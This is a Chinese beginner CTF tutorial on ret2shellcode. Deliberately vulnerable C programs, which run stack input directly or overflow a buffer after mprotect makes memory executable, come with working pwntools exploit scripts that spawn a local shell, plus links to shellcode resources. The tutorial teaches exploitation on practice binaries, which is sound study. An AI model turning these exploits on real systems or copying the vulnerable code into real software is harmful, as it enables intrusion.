pwn入门-ret2shellcode

先看我的另一篇文章,shellcode详解

例一

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int dofunc(){
	char b[0x100];
	puts("input:");	
	read(0,b,0x100);
	((void (*) (void)) b)();
    return 0;
}

int main(){
    dofunc();
    return 0;
}

image-20250107164228610

NX:栈不可执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile= './question_6_1_x64'
io = process(pwnfile)
#io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)

payload = asm(shellcraft.sh())

delimiter = 'input:'
io.sendlineafter(delimiter, payload)

io.interactive()

例二

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
/*
int mprotect(const void *start, size_t len, int prot);
第一个参数:开始地址(该地址应是0x1000的倍数,以页方式对齐)
第二个参数:指定长度(长度也应该是0x1000的倍数)
第三个参数:指定属性
	PROT_NONE:The memory cannot be accessed at all.完全无法访问内存。
	PROT_READ:The memory can be read.可以读取内存。
	PROT_WRITE:The memory can be modified.内存可以修改。
	PROT_EXEC:The memory can be executed.内存可以执行。
    可读可写可执行(0x111=7)W
	oj->level5
*/

int dofunc(){
	char b[0x100];
	int pagesize = getpagesize();
	//printf("%d\n",pagesize);
	//printf("%d\n",&b);
	long long int addr = (long long int)&b;
	addr = (addr >>12)<<12;
	mprotect(addr, pagesize, 7);	
	puts("input:");	
	read(0,b,0x100);
	((void (*) (void)) b)();
    return 0;
}

int main(){
    dofunc();
    return 0;
}
//gcc question_6_2.c  -fno-stack-protector -no-pie  -o question_6_2_x64

image-20250107171227705

保护表面是开的,但其实由于mprotect,中有部分是可执行的栈

exp: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile= './question_6_2_x64'
io = process(pwnfile)
#io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)

duchao_pwn_script.dbg(io)
payload = asm(shellcraft.sh())

delimiter = 'input:'
io.sendlineafter(delimiter, payload)

io.interactive()

例三

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
/*
int mprotect(const void *start, size_t len, int prot);
第一个参数:开始地址(该地址应是0x1000的倍数,以页方式对齐)
第二个参数:指定长度(长度也应该是0x1000的倍数)
第三个参数:指定属性
	PROT_NONE:The memory cannot be accessed at all.完全无法访问内存。
	PROT_READ:The memory can be read.可以读取内存。
	PROT_WRITE:The memory can be modified.内存可以修改。
	PROT_EXEC:The memory can be executed.内存可以执行。
    可读可写可执行(0x111=7)W
*/
char buf2[0x100];

int dofunc(){
    char buf[0x100];
	int pagesize = getpagesize();
	long long int addr = buf2;
	addr = (addr >>12)<<12;
	mprotect(addr, pagesize, 7);
	puts("input:");	
	read(0,buf,0x200);
    strncpy(buf2, buf, 100);
    printf("bye bye ~");
    return 0;
}

int main(){
    dofunc();
    return 0;
}
//gcc question_6_3.c  -fno-stack-protector -no-pie  -o question_6_3_x64

image-20250107172034869

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile= './question_6_3_x64'
io = process(pwnfile)
#io = remote('', )
elf = ELF(pwnfile)
rop = ROP(pwnfile)

retrurn_addr = elf.symbols['buf2']

padding2rbp = 0x110
padding  = padding2rbp + 8
payload = asm(shellcraft.sh()).ljust(padding,b'\x00') + p64(retrurn_addr)

delimiter = 'input:'
io.sendlineafter(delimiter, payload)
io.interactive()

例四

ret2shellcode,即控制程序执行 shellcode 代码。shel lcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。

例题:jarvisoj_level1

程序栈可执行,泄露buf地址,read函数存在栈溢出。思路:在buf地址处写入shellcode,覆盖ret地址为buf。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
#ret2shellcode
file_path='./level1'
context(binary=file_path,os='linux',terminal = ['tmux', 'sp', '-h'])
p = process("level1")

p.recvuntil("What's this:")
buf = int(p.recv(10),16)#读取0xaaaaaaaa

shellcode = asm(shellcraft.sh())
payload = shellcode
payload = payload.ljust(0x88+4,b'a')+p32(buf)
#gdb.attach(p)
p.send(payload)
p.interactive()

shell大全:http://shell-storm.org/shellcode

shellcode变形:https://github.com/SkyLined/alpha3

扩展阅读:https://www.anquanke.com/post/id/256530

shellcode方向:长度和绕过检测

英特尔未记录指令https://mp.weixin.qq.com/s/kFJUr_2ACX7eIvl9oT4zCg

官方后门https://mp.weixin.qq.com/s/16RwsTiyWH-w-Y19WngO9w

终端控制字符https://blog.csdn.net/justheretobe/article/details/6333129

其他cpu的未记录指令https://mp.weixin.qq.com/s/hnedwu6H3twgbLEBLstGAQMSVS

函数调用使用寄存器https://docs.microsoft.com/zh-cn/cpp/build/x64-calling-convention?view=msvc-170

微软没公开的函数:http://undocumented.ntinternals.net/